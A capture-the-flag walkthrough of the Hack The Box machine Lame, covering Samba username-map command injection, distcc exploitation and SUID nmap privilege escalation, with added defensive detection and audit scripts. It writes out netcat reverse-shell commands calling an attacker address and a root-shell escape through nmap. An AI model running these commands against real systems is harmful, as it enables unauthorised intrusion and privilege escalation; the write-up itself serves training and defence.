HTB – Lame

Lame is a straightforward machine that is great practice for preparing for the OSCP. It reinforces some solid concepts, offers a rabbit hole and allows for other means of exploitation.

In a nutshell, Lame, a Linux box, is exploited through a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands.

The rabbit hole on this box is a vulnerable FTP version, which we’ll explore and explain why it cannot be exploited.

Another method of rooting this box is to exploit a vulnerable service running on port 3632 called distcc. Once we’re able to gain an initial foothold onto the machine, we then need to escalate our privileges. Through some basic enumeration we see that nmap runs as root, and all that’s left is to break out and get a root shell using some basic nmap commands.

As for the OSCP, what did this box teach me:

  1. Enumerate for all ports. Our initial scan did not show port 3632 open.
  2. Leave no stone unturned. We checked FTP, we ran into some trouble on SMB. If we couldn’t figure out a workaround for SMB, we could have used the distcc vulnerability.
  3. How to use nmap to scan/exploit/privilege escalate

So without further ado:

Walkthrough for Lame

The IP for Lame is 10.10.10.3

First step, as always, is an nmap scan of the target host:

sudo nmap -sC -sV -Pn -oA nmap/lame 10.10.10.3

After we receive our initial results, we will run two more thorough scans, one for all ports and one for UDP.

ALLPORTS:
sudo nmap -p- -oA nmap/lame-allports 10.10.10.3

UDP:
sudo nmap -sU -p- -oA nmap/lame-UDP-allports 10.10.10.3

Our initial nmap scan returns a few open ports:

21/tcp  open  ftp           vsftpd 2.3.4
22/tcp  open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn?
445/tcp open  microsoft-ds?

ftp

My first reaction is to start poking around at port 21 and answer two questions:

  1. Does it allow anonymous authentication?
  2. Is the version vulnerable?

The FTP server does allow anonymous authentication.

But nothing really much going on inside here… the directory is empty.

Next let’s check the version:

Searchsploit returns two backdoor exploits for this version, one with Metasploit and one without. Let’s pull this exploit down and see if it works.

To pull exploits down from searchsploit we use this command:

searchsploit -m <fileName>
searchsploit -m 49757

Next step is to open the file in a text editor and see how it works:

  1. The exploit is using “USER nergal:)” as the username; after some research, we could use ANY username as long as we append ‘:)’ to it.
  2. It’s calling out to telnet on port 6200.

So let’s start up a netcat listener and let her rip!

I run the script

It eventually times out.

After some research, it seems the backdoor was in fact removed:

This module exploits a malicious backdoor that was added to the VSFTPD download archive. 
This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 
and July 1st 2011 according to the most recent information available. This backdoor was 
removed on July 3rd 2011.

-ExploitDB

Now that we know port 21 is not exploitable, we can move on to port 22. Spoiler alert, not vulnerable either.
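
The two things the exploit script revealed, a USER value containing ":)" and a follow-up connection to port 6200, are enough to build a detection from the defender's side. This is an added example, not part of the original post; the log lines, their field layout, the addresses and the 60-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed FTP protocol log lines (vsftpd-style) and constructed
# firewall connection records; every address and time is made up.
FTP_LOG = [
    'Mon Jul  4 10:00:01 2011 [pid 311] FTP command: Client "192.0.2.10", "USER alice"',
    'Mon Jul  4 10:00:05 2011 [pid 312] FTP command: Client "192.0.2.66", "USER nergal:)"',
    'Mon Jul  4 10:02:00 2011 [pid 313] FTP command: Client "192.0.2.77", "USER bob:)"',
]
CONN_LOG = [
    "2011-07-04T10:00:07 src=192.0.2.66 dport=6200",
    "2011-07-04T10:00:09 src=192.0.2.10 dport=21",
    "2011-07-04T10:30:00 src=192.0.2.77 dport=6200",
]

FTP_RE = re.compile(
    r'^(.{24}) \[pid \d+\] FTP command: Client "([^"]+)", "USER ([^"]*)"$')
CONN_RE = re.compile(r"^(\S+) src=(\S+) dport=(\d+)$")


def smiley_logins(ftp_lines):
    """Return (time, client, user) for USER commands whose name contains ':)'."""
    hits = []
    for line in ftp_lines:
        m = FTP_RE.match(line)
        if m and ":)" in m.group(3):
            ts = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y")
            hits.append((ts, m.group(2), m.group(3)))
    return hits


def correlate(ftp_lines, conn_lines, port=6200, window=timedelta(seconds=60)):
    """Rate each trigger 'high' if the same client reaches `port` within `window`."""
    conns = []
    for line in conn_lines:
        m = CONN_RE.match(line)
        if m and int(m.group(3)) == port:
            conns.append((datetime.fromisoformat(m.group(1)), m.group(2)))
    alerts = []
    for ts, client, user in smiley_logins(ftp_lines):
        followed = any(src == client and timedelta(0) <= t - ts <= window
                       for t, src in conns)
        alerts.append((client, user, "high" if followed else "medium"))
    return alerts


if __name__ == "__main__":
    for alert in correlate(FTP_LOG, CONN_LOG):
        print(alert)
```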

smb

Back to our nmap results, our next step is to check on ports 139 and 445, good old SMB.

I enumerated a little bit further on ports 139 and 445 to get the version numbers:

My next step was to use searchsploit once again:

The two most interesting ones to me are the ones where I am able to execute some commands. The first one is a Metasploit module, but searchsploit still allows me to pull down the exploit script. I’ll pull the script down and see if anything in the code gives me a hint as to how it works.

The exploit seems to work by specifying a username containing shell metacharacters.

We can break down this exploit a step further:

The nohup command executes another program specified as its argument and ignores all SIGHUP (hangup) signals.

In a Linux shell, backticks (` `) perform command substitution: the enclosed command is executed and its output is put in its place.

So it seems to me that I could put in some payload that results in a reverse shell and this username script will execute it.

I head over to pentestmonkey for their cheat sheet on reverse shells and I decided to go with the netcat version.

nc -e /bin/sh 10.0.0.1 1234

We then substitute our IP and port of our choice.

I put together my payload and attempt to log in. My netcat immediately picks up and boom!

But….

While it seems that the exploit worked and it caught on my nc listener, when I ran the command whoami I noticed that I connected to my own machine. I had to do some research on this and it seems the way smbclient handles login requests jacks up the payload so we have to find another way to log in to SMB.

I decided to connect to SMB and change usernames utilizing the logon command and voila, we’re connected as root. I am able to retrieve both flags from this shell.
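
The root cause described in this section, a login name reaching a shell command line unescaped, shown next to the fix from the defender's side. This is an added example, not code from the original post or from Samba; the helper command, the allowlist pattern and the sample name are assumptions constructed for illustration.

```python
import re
import subprocess

# Hypothetical stand-in for an external username-mapping helper: it simply
# echoes the name it is given. This is not Samba's code.
HELPER = "echo"

# Allowlist for account names (an assumption; adapt to local naming policy).
NAME_OK = re.compile(r"[A-Za-z0-9._-]{1,32}\$?")


def map_via_shell(username):
    """Flawed pattern: the name is pasted into a string that /bin/sh parses,
    so backticks inside it are treated as command substitution."""
    out = subprocess.run(["/bin/sh", "-c", f"{HELPER} {username}"],
                         capture_output=True, text=True, timeout=5)
    return out.stdout.strip()


def map_via_argv(username):
    """Fixed pattern: the name is one argv element and no shell ever parses it."""
    out = subprocess.run([HELPER, username],
                         capture_output=True, text=True, timeout=5)
    return out.stdout.strip()


def accept_username(username):
    """Second layer: reject names outside the allowlist before any lookup."""
    return NAME_OK.fullmatch(username) is not None


# Constructed, harmless input: the backticks wrap a plain echo.
SAMPLE = "guest`echo INJECTED`"

if __name__ == "__main__":
    print("shell :", map_via_shell(SAMPLE))    # substitution was evaluated
    print("argv  :", map_via_argv(SAMPLE))     # name stayed literal
    print("accept:", accept_username(SAMPLE))  # allowlist rejects it
```

Passing the name as an argv element removes the injection, and the allowlist gives a place to log and reject the attempt before the helper runs.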

distcc

I thought about the best way to search for exploits on distcc. I used Google and searchsploit, with which I had instant success. Google made mention of an nmap script that can be used to exploit this vulnerable version, so I decided to use the vuln scanner that’s built into the nmap scripting engine.

We can tell right away that the exploit worked because nmap outputs the uid for the user daemon. I wanted to look more at this script and see if I could decipher what is going on.

Full disclosure, I pulled down the metasploit exploit and couldn’t make out exactly what was going on. I plan to return later on in the future but for now I found another way.

So let’s use the locate command and get the distcc script.

And then cat the results to the screen:

How convenient, don’t you love when an exploit script tells you exactly what to do!

I copied and pasted the command above and substituted id for a reverse shell similar to the one we used during the smb exploit.

And it failed.

Why? The script is using the old name and not the new name we downloaded to our machine.

The actual command is

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.16.2 1234'"

I set up a listener on port 1234 and the connection was a success!

Now that we have a shell as user daemon, it’s time to start the privesc process.

I tried to get LinEnum on this machine via wget and curl but I kept running into trouble. So I did some poking around and decided to check the SUID permissions. A quick find search shows the output below.

And I notice right off the bat that nmap is running as root.

I decided to head over to GTFOBins and saw that nmap can actually spawn a root shell.

nmap --interactive
nmap> !sh 

This leads us to root!
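
The same SUID check, run as a defensive audit: walk a tree, list setuid files, and mark the ones that can start a shell. This is an added example, not part of the original post; the watch list is a short constructed sample (nmap is the case from this walkthrough) and the severity labels are assumptions.

```python
import os
import stat

# Short, non-exhaustive watch list (constructed for this example): programs
# that can start a shell or run commands, so a setuid bit on them hands the
# owner's privileges to any local user.
WATCH = {"nmap", "vim", "find", "bash", "sh", "python", "perl", "awk", "less", "more"}


def classify(path, mode, uid):
    """Return None for anything that is not a setuid regular file,
    otherwise a finding with an assumed severity label."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
        return None
    # Strip version suffixes so python3.8 is matched as python.
    name = os.path.basename(path).rstrip("0123456789.")
    critical = name in WATCH and uid == 0
    return {"path": path, "owner_uid": uid,
            "severity": "critical" if critical else "review"}


def audit(root):
    """Walk `root` without following symlinks and collect setuid findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            finding = classify(path, st.st_mode, st.st_uid)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: (f["severity"], f["path"]))


if __name__ == "__main__":
    for f in audit("/usr"):
        print(f["severity"], f["owner_uid"], f["path"])
```

Anything reported as critical should have its setuid bit removed or the package replaced; the remaining entries are the baseline to compare against on the next run.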

All in all this was a fun box and it allowed me to work out a few issues here and there, which is a great learning experience. I think I will revisit this box and focus solely on the distcc portion. I believe there are more ways to exploit this service and I would like to understand the Metasploit script a bit more.

Oh and before I forget, all these shells being spawned from netcat are not very “interactive” so don’t forget:

python -c 'import pty;pty.spawn("/bin/sh")'
